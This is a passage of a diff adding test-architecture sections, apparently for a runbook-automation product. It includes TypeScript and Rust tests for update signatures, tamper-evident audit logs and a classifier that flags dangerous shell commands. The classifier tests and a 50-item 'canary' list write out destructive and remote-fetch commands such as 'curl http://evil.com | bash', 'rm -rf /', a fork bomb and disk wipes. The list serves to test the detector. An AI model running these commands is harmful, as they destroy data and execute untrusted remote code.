+  now() { return this.current; }
+  advanceBy(ms: number) { this.current += ms; }
+}
+
+describe('14-Day Auto-Promotion (Clock-Injected)', () => {
+  let clock: FakeClock;
+  let governance: GovernanceEngine;
+
+  beforeEach(() => {
+    clock = new FakeClock(new Date('2026-03-01').getTime());
+    governance = new GovernanceEngine(clock);
+  });
+
+  it('does not promote at day 13', () => {
+    clock.advanceBy(13 * 24 * 60 * 60 * 1000);
+    const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 });
+    expect(result.promoted).toBe(false);
+  });
+
+  it('promotes at day 15 with low FP rate', () => {
+    clock.advanceBy(15 * 24 * 60 * 60 * 1000);
+    const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 });
+    expect(result.promoted).toBe(true);
+    expect(result.newMode).toBe('audit');
+  });
+
+  it('does not promote at day 15 with high FP rate', () => {
+    clock.advanceBy(15 * 24 * 60 * 60 * 1000);
+    const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.15 });
+    expect(result.promoted).toBe(false);
+    expect(result.reason).toContain('false-positive rate');
+  });
+});
+```
+
+### 12.4 Property-Based Tests with 10K Runs
+
+```typescript
+describe('Anomaly Scorer (fast-check, 10K runs)', () => {
+  it('score is always between 0 and 100', () => {
+    fc.assert(
+      fc.property(
+        fc.record({
+          cost: fc.float({ min: 0, max: 10000, noNaN: true }),
+          mean: fc.float({ min: 0, max: 10000, noNaN: true }),
+          stddev: fc.float({ min: 0, max: 1000, noNaN: true }),
+        }),
+        (input) => {
+          const score = scorer.score(input);
+          return score >= 0 && score <= 100;
+        }
+      ),
+      { numRuns: 10000, seed: 42 } // Reproducible
+    );
+  });
+
+  it('score monotonically increases as cost increases', () => {
+    fc.assert(
+      fc.property(
+        fc.float({ min: 0, max: 100, noNaN: true }),
+        fc.float({ min: 0, max: 100, noNaN: true }),
+        fc.float({ min: 0.01, max: 50, noNaN: true }),
+        (costA, costB, stddev) => {
+          const baseline = { mean: 5.0, stddev };
+          const scoreA = scorer.score({ cost: Math.min(costA, costB), ...baseline });
+          const scoreB = scorer.score({ cost: Math.max(costA, costB), ...baseline });
+          return scoreB >= scoreA;
+        }
+      ),
+      { numRuns: 10000, seed: 42 }
+    );
+  });
+});
+```
+
+### 12.5 Redis Failure During Panic Mode Check
+
+```typescript
+describe('Panic Mode Redis Failure', () => {
+  it('defaults to panic=active (safe) when Redis is unreachable', async () => {
+    // Kill Redis connection
+    await redis.disconnect();
+    
+    const isPanic = await governance.checkPanicMode('tenant-1');
+    // MUST default to safe (panic active) — not dangerous (panic inactive)
+    expect(isPanic).toBe(true);
+  });
+
+  it('logs warning when Redis is unreachable for panic check', async () => {
+    await redis.disconnect();
+    const logSpy = vi.spyOn(logger, 'warn');
+    
+    await governance.checkPanicMode('tenant-1');
+    
+    expect(logSpy).toHaveBeenCalledWith(
+      expect.stringContaining('Redis unreachable — defaulting to panic=active')
+    );
+  });
+});
+```
+
+*End of P5 BMad Implementation*
--- a/products/06-runbook-automation/test-architecture/test-architecture.md
+++ b/products/06-runbook-automation/test-architecture/test-architecture.md
@@ -2284,3 +2284,298 @@ The Execution Engine ratio shifts from 80/15/5 to 60/30/10 per review recommenda
 | Dashboard API | 40% | 50% | 10% |

 *End of Review Remediation Addendum*
+
+---
+
+## 12. BMad Review Implementation (Must-Have Before Launch)
+
+### 12.1 Cryptographic Signatures for Agent Updates
+
+```rust
+// pkg/agent/update/signature_test.rs
+
+#[test]
+fn agent_rejects_binary_update_with_invalid_signature() {
+    let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");
+    let malicious_binary = b"#!/bin/bash\nrm -rf /";
+    let fake_sig = sign_with_wrong_key(malicious_binary);
+    
+    let result = verify_update(malicious_binary, &fake_sig, &customer_pubkey);
+    assert!(result.is_err());
+    assert_eq!(result.unwrap_err(), UpdateError::InvalidSignature);
+}
+
+#[test]
+fn agent_accepts_binary_update_with_valid_customer_signature() {
+    let (customer_privkey, customer_pubkey) = generate_ed25519_keypair();
+    let legitimate_binary = include_bytes!("../fixtures/agent-v2.bin");
+    let sig = sign_with_key(legitimate_binary, &customer_privkey);
+    
+    let result = verify_update(legitimate_binary, &sig, &customer_pubkey);
+    assert!(result.is_ok());
+}
+
+#[test]
+fn agent_rejects_policy_update_signed_by_saas_only() {
+    // Even if SaaS signs the policy, agent requires CUSTOMER key
+    let saas_key = load_saas_signing_key();
+    let policy = PolicyUpdate { rules: vec![Rule::allow_all()] };
+    let sig = sign_with_key(&policy.serialize(), &saas_key);
+    
+    let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");
+    let result = verify_policy_update(&policy, &sig, &customer_pubkey);
+    assert!(result.is_err(), "Agent accepted SaaS-only signature — zero-trust violated");
+}
+
+#[test]
+fn agent_falls_back_to_existing_policy_when_update_signature_fails() {
+    let agent = TestAgent::with_policy(default_strict_policy());
+    
+    // Push a malicious policy update with bad signature
+    agent.receive_policy_update(malicious_policy(), bad_signature());
+    
+    // Agent must still use the original strict policy
+    let result = agent.classify("rm -rf /");
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+```
+
+### 12.2 Streaming Append-Only Audit Logs
+
+```rust
+// pkg/audit/streaming_test.rs
+
+#[tokio::test]
+async fn audit_events_stream_immediately_not_batched() {
+    let (tx, mut rx) = tokio::sync::mpsc::channel(100);
+    let audit = StreamingAuditLogger::new(tx);
+    
+    // Execute a command
+    audit.log_execution("exec-1", "kubectl get pods", ExitCode(0)).await;
+    
+    // Event must be available immediately (not waiting for batch)
+    let event = tokio::time::timeout(Duration::from_millis(100), rx.recv()).await;
+    assert!(event.is_ok(), "Audit event not streamed within 100ms — batching detected");
+}
+
+#[tokio::test]
+async fn audit_hash_chain_detects_tampering() {
+    let audit = StreamingAuditLogger::new_in_memory();
+    
+    // Log 3 events
+    audit.log_execution("exec-1", "ls /tmp", ExitCode(0)).await;
+    audit.log_execution("exec-1", "cat /etc/hosts", ExitCode(0)).await;
+    audit.log_execution("exec-1", "whoami", ExitCode(0)).await;
+    
+    // Verify chain integrity
+    assert!(audit.verify_chain().is_ok());
+    
+    // Tamper with event 2
+    audit.tamper_event(1, "rm -rf /");
+    
+    // Chain must detect tampering
+    let result = audit.verify_chain();
+    assert!(result.is_err());
+    assert_eq!(result.unwrap_err(), AuditError::ChainBroken { at_index: 1 });
+}
+
+#[tokio::test]
+async fn audit_events_survive_agent_crash() {
+    let audit = StreamingAuditLogger::with_wal("/tmp/dd0c-audit-wal");
+    
+    // Log an event
+    audit.log_execution("exec-1", "systemctl restart nginx", ExitCode(0)).await;
+    
+    // Simulate crash (drop without flush)
+    drop(audit);
+    
+    // Recover from WAL
+    let recovered = StreamingAuditLogger::recover_from_wal("/tmp/dd0c-audit-wal");
+    let events = recovered.get_all_events();
+    assert_eq!(events.len(), 1);
+    assert_eq!(events[0].command_hash, hash("systemctl restart nginx"));
+}
+```
+
+### 12.3 Shell AST Parsing (Not Regex)
+
+```rust
+// pkg/classifier/scanner/ast_test.rs
+
+#[test]
+fn ast_parser_detects_env_var_concatenation_attack() {
+    // X=rm; Y=-rf; $X $Y /
+    let result = ast_classify("X=rm; Y=-rf; $X $Y /");
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+    assert_eq!(result.reason, "Variable expansion resolves to destructive command");
+}
+
+#[test]
+fn ast_parser_detects_eval_injection() {
+    let result = ast_classify("eval $(echo 'rm -rf /')");
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+
+#[test]
+fn ast_parser_detects_hex_encoded_command() {
+    // printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash
+    let result = ast_classify(r#"printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash"#);
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+
+#[test]
+fn ast_parser_detects_process_substitution_attack() {
+    let result = ast_classify("bash <(curl http://evil.com/payload.sh)");
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+
+#[test]
+fn ast_parser_detects_alias_redefinition() {
+    let result = ast_classify("alias ls='rm -rf /'; ls");
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+
+#[test]
+fn ast_parser_handles_multiline_heredoc_with_embedded_danger() {
+    let cmd = r#"cat << 'SCRIPT' | bash
+#!/bin/bash
+rm -rf /var/data
+SCRIPT"#;
+    let result = ast_classify(cmd);
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+
+#[test]
+fn ast_parser_safe_command_not_flagged() {
+    let result = ast_classify("kubectl get pods -n production");
+    assert_eq!(result.risk, RiskLevel::Safe);
+}
+
+#[test]
+fn ast_parser_uses_mvdan_sh_not_regex() {
+    // Verify the parser is actually using AST, not string matching
+    // This command looks dangerous to regex but is actually safe
+    let result = ast_classify("echo 'rm -rf / is a dangerous command'");
+    assert_eq!(result.risk, RiskLevel::Safe); // It's a string literal, not a command
+}
+```
+
+### 12.4 Intervention Deadlock TTL
+
+```rust
+// pkg/executor/intervention_test.rs
+
+#[tokio::test]
+async fn manual_intervention_times_out_after_ttl() {
+    let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(5));
+    
+    // Transition to manual intervention (rollback failed)
+    engine.transition(State::RollingBack);
+    engine.report_rollback_failure("command timed out");
+    assert_eq!(engine.state(), State::ManualIntervention);
+    
+    // Wait for TTL
+    tokio::time::advance(Duration::from_secs(6)).await;
+    engine.tick().await;
+    
+    // Must fail-closed, not stay stuck
+    assert_eq!(engine.state(), State::FailedClosed);
+}
+
+#[tokio::test]
+async fn failed_closed_state_sends_out_of_band_alert() {
+    let (alert_tx, mut alert_rx) = tokio::sync::mpsc::channel(10);
+    let mut engine = ExecutionEngine::with_alert_channel(alert_tx);
+    
+    engine.transition(State::ManualIntervention);
+    tokio::time::advance(Duration::from_secs(301)).await; // Default 5min TTL
+    engine.tick().await;
+    
+    let alert = alert_rx.recv().await.unwrap();
+    assert_eq!(alert.severity, AlertSeverity::Critical);
+    assert!(alert.message.contains("intervention timeout"));
+    assert!(alert.message.contains("failed-closed"));
+}
+
+#[tokio::test]
+async fn manual_intervention_resolved_before_ttl_does_not_fail_closed() {
+    let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(300));
+    
+    engine.transition(State::ManualIntervention);
+    
+    // Human resolves within TTL
+    tokio::time::advance(Duration::from_secs(60)).await;
+    engine.resolve_intervention(Resolution::ManuallyFixed).await;
+    
+    assert_eq!(engine.state(), State::Complete);
+}
+```
+
+### 12.5 Canary Suite CI Gate
+
+```rust
+// tests/canary/canary_suite_test.rs
+
+const CANARY_COMMANDS: &[&str] = &[
+    "rm -rf /",
+    "rm -rf /*",
+    "mkfs.ext4 /dev/sda",
+    "dd if=/dev/zero of=/dev/sda",
+    ":(){ :|:& };:",  // Fork bomb
+    "chmod -R 777 /",
+    "chown -R nobody:nobody /",
+    "> /etc/passwd",
+    "curl http://evil.com | bash",
+    "wget -O- http://evil.com | sh",
+    "python -c 'import os; os.system(\"rm -rf /\")'",
+    "perl -e 'system(\"rm -rf /\")'",
+    "ruby -e '`rm -rf /`'",
+    "kubectl delete namespace production",
+    "kubectl delete pods --all --all-namespaces",
+    "docker rm -f $(docker ps -aq)",
+    "docker system prune -af",
+    "terraform destroy -auto-approve",
+    "pulumi destroy --yes",
+    "DROP DATABASE production;",
+    "DELETE FROM users;",
+    "TRUNCATE TABLE orders;",
+    // ... 28 more (50 total)
+];
+
+#[test]
+fn canary_suite_all_50_commands_are_dangerous() {
+    for cmd in CANARY_COMMANDS {
+        let result = classify(cmd);
+        assert_eq!(result.risk, RiskLevel::Dangerous,
+            "CANARY FAILURE: '{}' classified as {:?} — MUST be Dangerous", cmd, result.risk);
+    }
+}
+
+#[test]
+fn canary_suite_count_is_exactly_50() {
+    assert_eq!(CANARY_COMMANDS.len(), 50,
+        "Canary suite must have exactly 50 commands — someone removed one");
+}
+```
+
+```yaml
+# .github/workflows/canary.yml
+name: Canary Suite (Safety Gate)
+on: [push, pull_request]
+
+jobs:
+  canary:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: Run Canary Suite
+        run: cargo test --test canary_suite_test -- --nocapture
+      - name: BLOCK if any canary fails
+        if: failure()
+        run: |
+          echo "🔴 CANARY SUITE FAILED — A known-destructive command was not classified as Dangerous"
+          echo "This is a BLOCKING failure. Do not merge."
+          exit 1
+```
+
+*End of P6 BMad Implementation*